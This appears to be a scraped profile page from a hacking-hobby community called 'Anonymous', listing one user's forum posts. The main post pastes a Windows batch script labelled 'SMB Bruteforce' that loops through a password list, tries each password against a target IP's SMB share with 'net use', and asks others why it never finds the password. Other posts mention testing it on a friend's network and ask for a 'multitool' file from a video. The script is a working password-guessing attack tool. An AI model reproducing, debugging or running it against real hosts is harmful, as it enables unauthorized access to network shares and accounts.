Activity
Mon
Wed
Fri
Sun
Oct
Nov
Dec
Jan
Feb
Mar
Apr
May
Jun
Jul
Aug
Sep
What is this?
Less
More

Memberships

Anonymous

Public • 2k • Free

3 contributions to Anonymous
SMB
hi guys, I was trying the SMB bruteforce, only that every time I use it it tells me that the password was not found, but I'm sure I put it on the passlist and that it's right, some help? here che source: REM SETUP @echo off title SMB Bruteforce - by Sam1093k mode con cols=120 lines=30 chcp 65001 >nul cls CALL :LOGO pause >nul REM LOGO :LOGO echo. echo. echo ██████ ███▄ ▄███▓ ▄▄▄▄ echo ▒██ ▒ ▓██▒▀█▀ ██▒▓█████▄ echo ░ ▓██▄ ▓██ ▓██░▒██▒ ▄██ echo ▒ ██▒▒██ ▒██ ▒██░█▀ echo ▒██████▒▒▒██▒ ░██▒░▓█ ▀█▓ echo ▒ ▒▓▒ ▒ ░░ ▒░ ░ ░░▒▓███▀▒ echo ░ ░▒ ░ ░░ ░ ░▒░▒ ░ echo ░ ░ ░ ░ ░ ░ ░ echo ░ ░ ░ echo ░ echo. echo. color A set /p ip="Enter IP Address: " set /p user="Enter Username: " set /p wordlist="Enter Password List: " set /a count=1 for /f %%a in (%wordlist%) do ( set pass=%%a call :attempt ) echo Password not Found :( pause exit :success echo. echo Password Found! %pass% net use \\%ip% /d /y >nul 2>&1 pause exit :attempt net use \\%ip% /user:%user% %pass% >nul 2>&1 echo [ATTEMPT %count%] [%pass%] set /a count=%count%+1 if %errorlevel% EQU 0 goto success
0
18
New comment 4d ago
0 likes • 4d
@Aronas Finocenka before "color A"?
0 likes • 4d
@Aronas Finocenka nothing, i have no idea why
SMB
hi guys, I was testing Ebola's SMB bruteforce with my friend's wifi (with his consent obvious) but it is telling me that the password is not found, but I'm sure it's right and that I have added it to the passlist, some help?
0
0
MultiTool
hi guys, someone can pass me the file of the multitool Ebola did in the video yesterday? cus i follow the video but did't show the menu, and i can't find a solution (i copy all the steps). thanks guys
0
3
New comment 5d ago
1-3 of 3
Samuele Ciolini
1
5points to level up
@samuele-ciolini-8027
.

Active 1d ago
Joined Sep 12, 2024
powered by